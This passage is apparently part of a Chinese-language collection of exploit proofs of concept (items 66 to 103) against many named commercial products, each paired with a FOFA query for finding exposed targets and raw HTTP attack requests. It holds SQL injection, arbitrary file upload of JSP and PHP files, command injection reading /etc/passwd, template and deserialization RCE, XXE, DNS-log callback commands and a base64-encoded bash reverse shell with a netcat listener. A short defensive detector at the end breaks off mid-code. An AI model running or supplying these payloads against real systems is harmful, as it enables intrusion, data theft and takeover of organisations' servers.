operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, the dir parameter sets the path it is written to, and the fileType parameter sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器 remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows (it drops a Godzilla webshell):
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin (Legendsec) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the uploaded file (the name given in the upfile part) to confirm:
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the serialized payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated base64 into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on the Kali box:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3IDA%2BJjE%3D}|{base64,-d}|{bash,-i}'.execute();

Note: the base64 must encode the raw command (bash -i >& /dev/tcp/192.168.40.128/7777 0>&1), not a URL-encoded copy of it (a decoded "bash%20-i%20..." will not run), and any "+" or "=" inside the base64 must be percent-encoded as %2B and %3D, because the body is form-encoded and a bare "+" is decoded as a space.

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (Yingkeshi) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
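
An added example for the defending side, not part of the original list: it decodes a SAMLRequest parameter (plain base64 for the POST binding, base64 over raw DEFLATE for the redirect binding) and flags a DOCTYPE that declares an external entity, which is what the request above carries. The sample input is the SAMLRequest value from the PoC; the benign AuthnRequest is constructed for contrast. Feed it the parameter value after URL-decoding.

```python
import base64
import re
import zlib

# Markers of an inline DTD that pulls in an external resource: a DOCTYPE plus an
# ENTITY (parameter or general) with a SYSTEM or PUBLIC identifier.
_DOCTYPE = re.compile(rb"<!DOCTYPE\b", re.I)
_EXTERNAL_ENTITY = re.compile(rb"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.I)


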